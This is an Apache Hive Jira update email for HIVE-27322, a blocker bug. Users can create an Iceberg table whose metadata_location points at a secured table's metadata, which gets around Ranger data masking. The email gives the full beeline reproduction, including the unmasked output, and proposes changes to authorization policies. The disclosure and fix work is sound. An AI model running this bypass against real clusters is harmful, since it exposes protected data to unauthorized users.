[
https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Janos Kovacs updated HIVE-27322:
--------------------------------
Description:
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
direct file-system access needs
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED
BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt | icebergsecured.secret |
+------------------------------------+--------------------------------+
| You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user to create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep
metadata_location |grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY
ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
| trojanhorse.txt | trojanhorse.secret |
+------------------------------------+-----------------------------------+
| You might be allowed to see this. | You are not allowed to see this! |
+------------------------------------+-----------------------------------+
{noformat}
Currently - after HIVE-26707 - the rwstorage authorization only has either the
dummy path or the explicit path set for uri:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
This is can be used only to decide whether a user is allowed to create iceberg
tables in certain databases with certain names but controlling it's metadata
location is hard in that form.
A change is required that takes the custom value from TBLPROPERTIES if set and
passes to the Authorizer.
was:
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
direct file-system access needs
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED
BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt | icebergsecured.secret |
+------------------------------------+--------------------------------+
| You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user to create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep
metadata_location |grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY
ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
| trojanhorse.txt | trojanhorse.secret |
+------------------------------------+-----------------------------------+
| You might be allowed to see this. | You are not allowed to see this! |
+------------------------------------+-----------------------------------+
{noformat}
Currently - after HIVE-26707 - the rwstorage authorization only has either the
dummy path or the explicit path set for uri:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
This is can be used only to decide whether a user is allowed to create iceberg
tables in certain databases with certain names but controlling it's metadata
location is hard in that form:
* it does not provide a variable of "default table location" so a rule needs
to know the per-database table location or per-catalog warehouse location to be
able to construct it
* it does not provide a rich regex to filter out `/../` style directory
references
* but basically there should be also a flag whether explicit metadata location
is provided or not instead of the dummy reference, which then again needs
explicit matching in the policy to handle
Proposed enhancement:
* The URL for the iceberg table's rwstorage authorization should be changed
the following way
** the <database>/<table>?<location> is good but
*** the location should not be url encoded, or at least the authorizer should
check the policy against the decoded url
*** the separator between the table and location should be "/" instead of "?"
as "?" might be mixed with its regex meaning!
*** "/" as separator can be also confusing as the absolute paths would start
with it. Might be that another separator character that does not conflict with
regex, paths and table-name valid characters would be even better.
** the "snapshot=" seems to be non-relevant in this context, it should not be
part of the <location>
** There is a need to differentiate the cases where location is only generated
or when location is explicitly provided by end user. For this, the "default"
location might just not be generated as path but replaced with
"default_location" fixed value - note! it has no leading "/". That way a single
policy definition could be used to cover all tables in their default locations
like:
{noformat}
iceberg://mydatabase/*/default_location or
iceberg://mydatabase/*/snapshot=default_location{noformat}
*
**
*** "default" here means the table's default location which can depend on the
warehouse location, the database location and the table's explicit location
*** I know many developers don't like these type of hardcoded static values
but with such a value there is no need to modify the rwstorage authorization
(and we already using similar method for "METASTOER" type of storagehandler
authorization)
* The authorization request should include the rwstorage authorization only if
the CERATE/ALTER/DROP is against the Iceberg table and not if in such
statements the iceberg table is only a source - that might be already in fix
via HIVE-27304
* When any custom Iceberg metadata.json location is provided then the
<location> must contain to provided path to be able to properly authorize it.
* We either should not allow backstep "/../" in any locations or give an
option to filter these out in the final authorization step.
Like with a policy on
{noformat}
iceberg://mydatabase/mytable//data/use-case-1/* or
iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat}
should not match access for
{noformat}
iceberg://mydatabse/mytable//data/use-case-1/../use-case-2/* or
iceberg://mydatabse/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat}
*
** Not allowing "/../" might be easier to handle on hive/impala side
** But "/../" might be still valid if it used within an allowed locations. -->
users just should use proper location w/o "/../"
With the above changes one single new default Ranger policy could be used to
globally enable the creation of iceberg tables in any databases in any table
locations but NOT using any custom metadata locations (in case if user doesn't
want to globally turn storagehandler authorization off - via
hive.security.authorization.tables.on.storagehandlers=false - because of other
- hbase, kafka - handlers):
{noformat}
iceberg://*/*/default_location or
iceberg://*/*/snapshot=default_location {noformat}
Note that there is no extra "/" in front of "default_location", only the
separator character in the first case
Also with the above changes we could allow users to configure authorizations
for custom/shared data location via:
{noformat}
iceberg://mydatabase/*//some/shared/table/location/* or
iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat}
> Iceberg: metadata location overrides can cause data breach - custom location
> to AuthZ
> -------------------------------------------------------------------------------------
>
> Key: HIVE-27322
> URL: https://issues.apache.org/jira/browse/HIVE-27322
> Project: Hive
> Issue Type: Sub-task
> Components: Iceberg integration
> Affects Versions: 4.0.0-alpha-2
> Reporter: Janos Kovacs
> Assignee: Ayush Saxena
> Priority: Blocker
> Labels: check, pull-request-available
> Fix For: 4.0.0
>
>
> Set to bug/blocker instead of enhancement due to its security related nature,
> Hive4 should not be released w/o fix for this. Please reset if needed.
>
> Context:
> * There are some core tables with sensitive data that users can only query
> with data masking enforced (e.g. via Ranger). Let's assume this is the
> `default.icebergsecured` table.
> * An end-user can only access the masked form of the sensitive data as
> expected...
> * The users also have privilege to create new tables in their own sandbox
> databases - let's assume this is the `default.trojanhorse` table for now.
> * The user can create a malicious table that exposes the sensitive data
> non-masked leading to a possible data breach.
> * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
> direct file-system access needs
> Repro:
> * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string)
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
> this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> | icebergsecured.txt | icebergsecured.secret |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
> +------------------------------------+--------------------------------+
> {noformat}
> * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
> beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep
> metadata_location |grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED
> BY ICEBERG
> TBLPROPERTIES (
> 'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> | trojanhorse.txt | trojanhorse.secret |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this. | You are not allowed to see this! |
> +------------------------------------+-----------------------------------+
> {noformat}
>
> Currently - after HIVE-26707 - the rwstorage authorization only has either
> the dummy path or the explicit path set for uri:
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>
> {noformat}
> This is can be used only to decide whether a user is allowed to create
> iceberg tables in certain databases with certain names but controlling it's
> metadata location is hard in that form.
> A change is required that takes the custom value from TBLPROPERTIES if set
> and passes to the Authorizer.
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)